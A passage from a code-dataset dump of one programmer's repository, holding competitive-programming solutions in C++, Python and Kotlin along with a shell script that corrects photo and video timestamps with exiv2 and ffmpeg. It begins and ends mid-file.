int count = 0;\r\n for (auto car : world.getCars())\r\n count += car.getRemainingNitroTicks() > 100;\r\n if (world.getTick() <= game.getInitialFreezeDurationTicks() && count > 1 && world.getTick() >= 150)\r\n move.setUseNitro(true);\r\n}\r\n\r\nMyStrategy::MyStrategy() \r\n{\r\n directions[make_pair(1, 0)] = RIGHT;\r\n directions[make_pair(-1, 0)] = LEFT;\r\n directions[make_pair(0, 1)] = DOWN;\r\n directions[make_pair(0, -1)] = UP;\r\n#define rht RIGHT_HEADED_T\r\n#define lht LEFT_HEADED_T\r\n#define tht TOP_HEADED_T \r\n#define bht BOTTOM_HEADED_T\r\n#define cr CROSSROADS\r\n dir[VERTICAL][UP] = dir[VERTICAL][DOWN] = true;\r\n dir[HORIZONTAL][LEFT] = dir[HORIZONTAL][RIGHT] = true;\r\n\r\n dir[LEFT_TOP_CORNER][RIGHT] = dir[LEFT_TOP_CORNER][DOWN] = true;\r\n dir[RIGHT_TOP_CORNER][LEFT] = dir[RIGHT_TOP_CORNER][DOWN] = true;\r\n dir[LEFT_BOTTOM_CORNER][RIGHT] = dir[LEFT_BOTTOM_CORNER][UP] = true;\r\n dir[RIGHT_BOTTOM_CORNER][LEFT] = dir[RIGHT_BOTTOM_CORNER][UP] = true;\r\n\r\n dir[rht][UP] = dir[rht][DOWN] = dir[rht][RIGHT] = true;\r\n dir[lht][DOWN] = dir[lht][UP] = dir[lht][LEFT] = true;\r\n dir[bht][DOWN] = dir[bht][LEFT] = dir[bht][RIGHT] = true;\r\n dir[tht][UP] = dir[tht][LEFT] = dir[tht][RIGHT] = true;\r\n\r\n dir[cr][DOWN] = dir[cr][UP] = dir[cr][LEFT] = dir[cr][RIGHT] = true;\r\n freopen(\"lol\", \"w\", stdout);\r\n#ifdef debug\r\n writeln(FUUUUU);\r\n#endif\r\n}\r\n\r\n//interpolate({0.5, 0.4}, {0.65, 0.365}, {0.85, 1/3}, {1.2, 0.2}, {1.4142135624, 0}, {1.66666, -1/8}, {2, -1/4}, {2.5, -1/3}, {3, -0.365}, {3.5, -0.365}, {3.25, -0.365})" }, { "alpha_fraction": 0.41152074933052063, "alphanum_fraction": 0.4350230395793915, "avg_line_length": 22.33333396911621, "blob_id": "9aa047b2a1e26aee388ebe02d3175efa38201566", "content_id": "ad39c475bd59d294f5f812b5dbf20ad6dab2992b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2170, "license_type": "no_license", "max_line_length": 109, "num_lines": 93, "path": 
"/trains/neerc/neerc.ifmo.ru.train.2013.10.23/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <iostream>\n#include <vector>\n#include <map>\n#include <deque>\n#include <algorithm>\n\nstruct sport\n{\n int laps_more;\n int finish_time;\n int speed;\n sport() {}\n sport(int a, int b, int s)\n {\n finish_time = a;\n laps_more = b;\n speed = s;\n }\n bool operator<(const sport &o) const\n {\n return o.speed < speed;\n }\n};\n\nusing namespace std;\n\nint main()\n{\n //freopen(\"output.txt\",\"w\",stdout);\n while (true)\n {\n int n;\n scanf(\"%d\",&n);\n if(n == 0)\n break;\n deque<sport> q1, q2;\n vector<sport> to_1;\n vector<sport> to_2;\n for(int i = 0; i < n; i++)\n {\n int t,c;\n scanf(\"%d %d\",&t,&c);\n\n to_1.push_back(sport(t,c,t));\n }\n int cur_time = 0;\n while(true)\n {\n if(to_1.empty() && to_2.empty() && q1.empty() && q2.empty())\n break;\n\n sort(to_1.begin(), to_1.end());\n sort(to_2.begin(), to_2.end());\n\n\n q1.insert(q1.begin(),to_1.begin(), to_1.end());\n to_1.clear();\n\n q2.insert(q2.begin(),to_2.begin(), to_2.end());\n to_2.clear();\n\n int next_time;\n if(!q1.empty() && !q2.empty())\n next_time = min(q1.back().finish_time,q2.back().finish_time);\n else if(q1.empty())\n {\n next_time = q2.back().finish_time;\n }\n else\n next_time = q1.back().finish_time;\n\n while(!q1.empty() && q1.back().finish_time <= next_time)\n {\n to_2.push_back(sport(next_time + q1.back().speed,q1.back().laps_more,q1.back().speed));\n q1.pop_back();\n }\n\n while(!q2.empty() && q2.back().finish_time <= next_time)\n {\n if(q2.back().laps_more != 1)\n to_1.push_back(sport(next_time + q2.back().speed,q2.back().laps_more-1,q2.back().speed));\n q2.pop_back();\n }\n\n cur_time = next_time;\n\n }\n\n printf(\"%d\\n\",cur_time);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5123003125190735, "alphanum_fraction": 0.519808292388916, "avg_line_length": 30.776649475097656, "blob_id": "85d15e3afdc685e54f92e1289664704e6f2ac653", 
"content_id": "6f8aef80743ee02beb80cb2f7afea5cd1e0d9381", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6260, "license_type": "no_license", "max_line_length": 928, "num_lines": 197, "path": "/CodeForce/0391/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d 
%d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nconst int N = 50001;\nint n, m, k;\n\n//copypasted from Megabyte777;\ntemplate <class Scalar>\nstruct range_t;\ntypedef range_t<double> range;\ntypedef range_t<float> range_f;\ntypedef range_t<int> range_i;\ntemplate <class Scalar>\nstruct range_t\n{\n Scalar inf, sup, r;\n\n range_t(Scalar inf, Scalar sup, Scalar r)\n : inf(inf)\n , r(r)\n , sup(sup)\n {}\n\n range_t()\n : inf(0)\n , sup(-1)\n {}\n\n bool is_empty() const { return inf > sup; }\n\n bool contains(Scalar x) const { return (inf <= x) && (x <= sup); }\n\n static range_t maximal()\n {\n static const Scalar max_val = std::numeric_limits<Scalar>::max();\n return range_t(-max_val, max_val);\n }\n};\n\ntemplate <class Scalar>\nrange_t<Scalar> const operator & (range_t<Scalar> const & a, range_t<Scalar> const & b)\n{\n return range_t<Scalar>(std::max(a.inf, b.inf), std::min(a.sup, b.sup));\n}\n\ninline float center(range_f const & r)\n{\n return .5f + r.inf / 2.f + r.sup / 2.f;\n}\n\ntemplate <class Scalar>\nScalar size(range_t<Scalar> const & r)\n{\n return r.sup - r.inf;\n}\n\ntemplate <typename Scalar>\nstruct interval_tree\n{\n ~interval_tree()\n {\n delete left_child;\n delete right_child;\n }\n\n interval_tree(std::vector<range_t<Scalar> > const &segments)\n : left_child(0)\n , right_child(0)\n {\n if (segments.size() == 0)\n return;\n std::vector<Scalar> coordinates;\n for (range_t<Scalar> const &r : segments)\n {\n coordinates.push_back(r.inf);\n coordinates.push_back(r.sup);\n }\n std::nth_element(coordinates.begin(), coordinates.begin() + coordinates.size() / 2, coordinates.end());\n mid = coordinates[coordinates.size() / 2];\n std::vector<range_t<Scalar> > left, right;\n for (range_t<Scalar> const &r : segments)\n {\n if (r.sup < mid)\n 
left.push_back(r);\n if (r.inf > mid)\n right.push_back(r);\n if (r.inf <= mid && r.sup >= mid)\n {\n left_segments.push_back(r);\n right_segments.push_back(r);\n }\n }\n std::sort(left_segments.begin(), left_segments.end(),\n [] (range_t<Scalar> const &a, range_t<Scalar> const &b)\n {\n return a.inf < b.inf;\n }\n );\n std::sort(right_segments.begin(), right_segments.end(),\n [] (range_t<Scalar> const &a, range_t<Scalar> const &b)\n {\n return a.sup > b.sup;\n }\n );\n left_child = new interval_tree(left);\n right_child = new interval_tree(right);\n }\n\n std::vector<range_t<Scalar> > get(Scalar q)\n {\n if (left_segments.empty())\n return std::vector<range_t<Scalar> >();\n std::vector<range_t<Scalar> > result;\n if (q < mid)\n result = left_child->get(q);\n if (q > mid)\n result = right_child->get(q);\n if (q < mid)\n {\n for (int i = 0; i < left_segments.size() && left_segments[i].inf <= q; ++i)\n result.push_back(left_segments[i]);\n }\n else\n {\n for (int i = 0; i < right_segments.size() && right_segments[i].sup >= q; ++i)\n result.push_back(right_segments[i]);\n }\n return std::move(result);\n }\n\nprivate:\n interval_tree *left_child, *right_child;\n Scalar mid;\n std::vector<range_t<Scalar> > left_segments, right_segments;\n\n interval_tree()\n : left_child(0)\n , right_child(0)\n {}\n};\n\nvector<range_t<int>> segments;\n\nvoid run()\n{\n int l, r, q;\n readln(n, m);\n int e = 0;\n fori(n)\n readln(l, r, q),\n segments.pb(range_t<int>(r, r + q, l)),\n e = max(e, q);\n interval_tree<int> it(segments);\n int ans = 0;\n fori(m)\n {\n if (ans / 2 == e)\n break;\n readln(l, r, q);\n if (q * 2 < ans)\n continue;\n auto vec = it.get(r);\n for (auto seg : vec)\n if (!(l >= seg.r || l + q < seg.r || seg.sup - seg.inf < ans / 2))\n ans = max(ans, min(min(seg.sup - r, r - seg.inf), min(seg.r - l, l + q - seg.r)));\n }\n cout << ans << endl;\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n 
//freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.41304346919059753, "alphanum_fraction": 0.5, "avg_line_length": 12.142857551574707, "blob_id": "f3697266d0918e5bb69b47164b2660620cb82b6b", "content_id": "032befb4cd4a138556cb62820917ab9fdb2ff510", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 92, "license_type": "no_license", "max_line_length": 18, "num_lines": 7, "path": "/CodeForce/1679/gen.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = 1000\nq = 2 * 10 ** 5\nprint(n)\nprint('?' * n)\nprint(q)\nfor i in range(q):\n print('a')\n" }, { "alpha_fraction": 0.39436620473861694, "alphanum_fraction": 0.42756539583206177, "avg_line_length": 27.399999618530273, "blob_id": "1e69c89f8fa65425da587c1c37651628b249a352", "content_id": "e1f0e9152d361d9ad77be2c16dbc6450e46ee570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 994, "license_type": "no_license", "max_line_length": 74, "num_lines": 35, "path": "/2021/yandexBackendFinal/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n, l = map(int, input().split())\n\nusers = [[] for i in range(n)]\nfor _ in range(n):\n c = int(input())\n for i in range(c):\n users[_].append(input().split('-'))\n\ndef formatM(m):\n return '30' if m == 30 else '00'\n\ncount = 0\nfor start in range(10, 20):\n for half in range(0, 60, 30):\n endH = start + l // 60\n endM = half + (l % 60)\n if endM == 60:\n endH += 1\n endM = 0\n if endH < 20 or endH == 20 and endM == 0:\n timeStart = f'{start}:{formatM(half)}'\n timeEnd = f'{endH}:{formatM(endM)}'\n ok = True\n for i in range(n):\n can = True\n for times in users[i]:\n if not (times[0] >= timeEnd or times[1] <= timeStart):\n can = False\n if not can:\n ok = False\n if ok:\n count += 1\n print(f'{timeStart}-{timeEnd}')\nif count == 0:\n print('No way')\n" }, { "alpha_fraction": 
0.3308270573616028, "alphanum_fraction": 0.4661654233932495, "avg_line_length": 18, "blob_id": "81c33cb8a021ce5deeab99f030d046c0f40fb278", "content_id": "4823b752c088f2cd80b494deda48c76311195d60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "no_license", "max_line_length": 48, "num_lines": 7, "path": "/CodeForce/0516/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "input()\ns=input()\na=\"\"\nt=[a,a,\"2\",\"3\",\"223\",\"5\",\"53\",\"7\",\"7222\",\"7332\"]\nfor c in s:\n a+=t[int(c)]\nprint(''.join(sorted(a)[::-1]))\n" }, { "alpha_fraction": 0.3347107470035553, "alphanum_fraction": 0.39669421315193176, "avg_line_length": 16.285715103149414, "blob_id": "242c5e9e32f3a5e9f6f7bf4cc43ce00ac0dea267", "content_id": "5736df120d39cc099012b7a67c8a482f703c82c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 242, "license_type": "no_license", "max_line_length": 57, "num_lines": 14, "path": "/staff/binSearchExample.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include \"library.h\"\n\nint main()\n{\n auto f = [](int x)\n {\n return power(x + 123, 3);\n };\n cout << fixed << (bin_search(-1000, 1000, [&f](int m)\n {\n return f(m) > 0;\n }, 1)) << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.3795892894268036, "alphanum_fraction": 0.43248289823532104, "avg_line_length": 41.28947448730469, "blob_id": "666c30a8e33c77c29e90c7a67c33cf12d951c465", "content_id": "2debcf666703d0b5ece054d94a600c267ca4405d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1607, "license_type": "no_license", "max_line_length": 127, "num_lines": 38, "path": "/scripts/fixDate.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "dateRegex=\"^[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]\\ 
[0-9][0-9]:[0-9][0-9]:[0-9][0-9]$\"\ndateShortRegex=\"^[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9] +\"\nfor f in \"$@\"; do\n date=$(exiv2 -p e \"$f\" | grep 'Exif.Photo.DateTimeOriginal' | awk '{print $4 \" \" $5;}' | sed 's/:/-/' | sed 's/:/-/')\n shift='+0300'\n echo \"Trying date $f '$date'\"\n if [[ ${date} = '' ]]; then\n date=$(ffmpeg -i \"$f\" 2>&1 | grep creation_time | head -1 | awk '{ print $3;}' | sed 's/[TZ]/ /g' | sed 's/\\.000000//')\n if [[ ${date} = '' ]]; then\n echo \"SKIP $f $date\"\n ffmpeg -i \"$f\"\n continue\n fi\n shift='+0000'\n elif ! [[ ${date} =~ $dateRegex ]]; then\n if [[ ${date} =~ $dateShortRegex ]]; then\n date=\"${date}00:00\"\n echo \"Found short date $f $date\"\n else\n date=$(exiv2 -p e \"$f\" | grep 'Exif.Image.DateTime' | awk '{print $4 \" \" $5; }' | sed 's/:/-/' | sed 's/:/-/')\n echo \"Trying original $f $date\"\n if ! [[ ${date} =~ $dateRegex ]]; then\n if [[ ${date} =~ $dateShortRegex ]]; then\n date=\"${date}00:00\"\n echo \"Found short date $f $date\"\n else\n echo \"SKIP $f $date\"\n exiv2 -p e \"$f\"\n continue\n fi\n fi\n fi\n fi\n echo \"Date found $f $date $shift\"\n exiv2 -v -M\"set Exif.Image.DateTime $date\" $f 1>/dev/null 2>&1\n exiv2 -v -M\"set Exif.Photo.DateTimeOriginal $date\" $f 1>/dev/null 2>&1\n touch -d \"$date $shift\" \"$f\"\ndone\n" }, { "alpha_fraction": 0.46226203441619873, "alphanum_fraction": 0.47502800822257996, "avg_line_length": 27.80645179748535, "blob_id": "4ffd5337a165410cb32fb2b3df9e52a10d646300", "content_id": "b8d9a14a466b418fac0da961164c9f48d527c937", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 4465, "license_type": "no_license", "max_line_length": 96, "num_lines": 155, "path": "/CodeForce/1570/I.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport java.lang.Integer.min\nimport kotlin.collections.*// }}}\n\nprivate const val MAX_N = 100_001\nprivate const val P = 
2000\n\nprivate val cnt = IntArray(MAX_N) { 0 }\nprivate val ord = IntArray(MAX_N) { 0 }\nprivate val bounds = Array(MAX_N) { Point(MAX_N, 0) }\n\ndata class Query(val t: Int, val l: Int, val r: Int, val k: Int, var index: Int)\ndata class Update(val index: Int, val from: Int, val to: Int)\ndata class Point(var x: Int, var y: Int)\n\nprivate fun run() {\n val (n, m) = readln()\n val a = readln()\n val queries = ArrayList<Query>()\n val updates = ArrayList<Update>()\n\n repeat(m) {\n val request = readln()\n var (t, l, r) = request\n l -= 1\n if (t == 1) {\n queries.add(Query(updates.size, l, r - 1, request[3], queries.size))\n } else {\n updates.add(Update(l, a[l], r))\n a[l] = r\n }\n }\n for ((i, from) in updates.reversed())\n a[i] = from\n\n val ans = IntArray(queries.size)\n queries.sortWith(compareBy({ it.t / P }, { it.l / P }, { it.r }))\n bounds[0] = Point(0, MAX_N - 1)\n var L = 0\n var R = -1\n var T = 0\n\n fun next(i: Int) = bounds[ord[i]].y + 1\n fun count(i: Int) = bounds[ord[i]].y - bounds[ord[i]].x + 1\n\n fun add(x: Int) {\n val c = cnt[x]++\n ord[bounds[c].x]++\n bounds[c + 1].y = bounds[c].x\n if (bounds[c + 1].x == MAX_N)\n bounds[c + 1].x = bounds[c].x\n if (bounds[c].x == bounds[c].y)\n bounds[c].x = MAX_N - 1\n ++bounds[c].x\n }\n fun del(x: Int) {\n val c = cnt[x]--\n ord[bounds[c].y]--\n if (bounds[c - 1].x == MAX_N)\n bounds[c - 1].y = bounds[c].y\n bounds[c - 1].x = bounds[c].y\n if (bounds[c].x == bounds[c].y)\n bounds[c].x = MAX_N\n --bounds[c].y\n }\n fun update(index: Int, forward: Boolean) {\n var (i, from, to) = updates[index]\n if (!forward) to = from\n if (i in L..R) {\n del(a[i])\n add(to)\n }\n a[i] = to\n }\n for ((t, l, r, k, id) in queries) {\n while (T < t) update(T++, true)\n while (T > t) update(--T, false)\n while (R < r) add(a[++R])\n while (L > l) add(a[--L])\n while (R > r) del(a[R--])\n while (L < l) del(a[L++])\n var res = MAX_N\n var i = 0\n var j = 0\n var sum = 0\n\n while (i < MAX_N && ord[i] > 0) {\n while (j < 
MAX_N && ord[j] > 0 && sum < k) {\n sum += count(j)\n j = next(j)\n }\n if (sum >= k)\n res = min(res, ord[i] - ord[j - 1])\n sum -= count(i)\n i = next(i)\n }\n if (res == MAX_N)\n ans[id] = -1\n else\n ans[id] = res\n }\n writeln(ans.joinToString(\"\\n\"))\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n run()\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) =\n println(strings.map { if (it is IntArray) it.joinToString(\" \") else it }.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.44218674302101135, "alphanum_fraction": 0.455249160528183, "avg_line_length": 31.809524536132812, "blob_id": "7f34a930fbb35c337336f9059f2983a108132ecd", "content_id": "98437da2333e234e2652ae1c1f31ad3443323ed1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"C++", "length_bytes": 2067, "license_type": "no_license", "max_line_length": 928, "num_lines": 63, "path": "/CodeForce/0291/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nint mn = INF, mx = 0;\nvector<int> a(1001);\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nbool readl(vector<int> &a, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n a[i] = x;\n }\n return true;\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');\n}\n\nint main()\n{\n// freopen(\"input.txt\", \"r\", stdin);\n//freopen(\"output.txt\", \"w+\", stdout);\n int count = 0, n;\n readln(n);\n bool f = false;\n readl(a, n);\n {\n for (int i = 1, c = 1; i <= n; i++)\n {\n if (!a[i])\n continue;\n c = 1;\n for (int j = i + 1; j <= n; j++)\n if (a[j] == a[i])\n ++c;\n if (c > 2)\n {\n f = true;\n break;\n }\n if (c == 2)\n count++;\n }\n }\n if (f)\n count = -1;\n writeln(count);\n return 0;\n}\n" }, { "alpha_fraction": 0.5289506316184998, "alphanum_fraction": 0.5462319850921631, "avg_line_length": 35.92763137817383, "blob_id": "5a0602c794b1bbccf3cfd75c1ee081b8b63167e1", "content_id": "30c409e72bd62f74c7282ef344c6a2a11a28e9e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5613, "license_type": "no_license", "max_line_length": 184, "num_lines": 152, "path": "/2020/snws4/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 14 september 2019 (writeln<T>, main) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef double ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... 
Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n\n//point\n#define pointtt template<typename T = int>\n//sorts only if z is corner point;\n#define sortByPolarAngle(v, z, T) sort(v.begin(), v.end(), [&z](point<T>& a, point<T>& b) {\\\n int q = orientation(z, a, b); return q == 0 ? dist(z, a) < dist(z, b) : q == -1;\\\n});\n\npointtt struct point\n{\n T x, y;\n point(){}\n point(T _x, T _y) : x(_x), y(_y) {}\n point operator+(const point& b) const { return point(x + b.x, y + b.y); }\n point operator-(const point& b) const { return point(x - b.x, y - b.y); }\n point operator-() const { return point(-x, -y); }\n T operator*(const point& b) const { return x * b.x + y * b.y; }\n T operator^(const point& b) const { return x * b.y - y * b.x; }\n T operator!() const { return x * x + y * y; }\n bool operator<(const point& b) const { return x == b.x ? 
y < b.y : x < b.x; }\n};\npointtt istream&operator>>(istream&is,point<T>&a){return is>>a.x>>a.y;}\npointtt ostream&operator<<(ostream&os,point<T>&a){return os<<a.x<<\" \"<<a.y;}\npointtt T dist(const point<T>&a,const point<T>&b){return!point<T>(a-b);}\n//dist from point C to line AB equals to answer.first / sqrt(answer.second);\npointtt pair<T,T> dist(const point<T>&a,const point<T>&b,const point<T>&c){return{abs((a-b)*c)+(a^b),dist(a,b)};}\npointtt int orientation(const point<T>&a,const point<T>&b,const point<T>&c){T q=a.x*b.y-a.y*b.x-a.x*c.y+a.y*c.x+b.x*c.y-b.y*c.x;return q>0?1:q<0?-1:0;}\n\n//convexHull\npointtt void convexHull(vector<point<T>>&a){sort(a.begin(),a.end());int n=a.size(),j=-1,k=0;ROF(i,n-2,0)a.push_back(a[i]);fori(a.size()){for(;j>k&&orientation(a[j-1],a[j],a[i])!=1;--j)\n ;a[++j]=a[i];if(!k&&i==n-1)k=j;}a.resize(j);}\n//reflect point C from line AB\npointtt point<T> reflect(const point<T>&a,const point<T>&b,const point<T>&c){\n T A = a.y - b.y;\n T B = b.x - a.x;\n T C = a ^ b;\n T D = A * A - B * B;\n T S = A * A + B * B;\n return {(-D * c.x - 2 * A * B * c.y - 2 * A * C) / S, (D * c.y - 2 * A * B * c.x - 2 * B * C) / S};\n};\n//}}}\n\nvoid run()\n{\n ints(n);\n auto nxt = [&](int i) { return (i + 1) % n; };\n vector<double> coeffs(n);\n vector<point<ll>> a(n);\n point<ll> v;\n fori(n)\n readln(a[i], coeffs[i]);\n readln(v);\n point<ll> w = {0, 0};\n double k = 1;\n int cc = 0;\n\n int last = -1;\n\n fori(n)\n if (orientation(w, a[i], a[nxt(i)]) == 0)\n last = i;\n\n while (k >= 0.0001)\n {\n ++cc;\n fori(n)\n {\n auto x = a[i];\n auto y = a[nxt(i)];\n if (last == i)\n continue;\n int o1 = orientation(w, v, x);\n int o2 = orientation(w, v, y);\n if (o1 == 0 || o2 == 0)\n {\n writeln(cc);\n return;\n }\n if (o1 != o2)\n {\n last = i;\n w = reflect(x, y, w);\n v = reflect(x, y, v);\n k *= coeffs[i];\n break;\n }\n }\n }\n writeln(cc);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << 
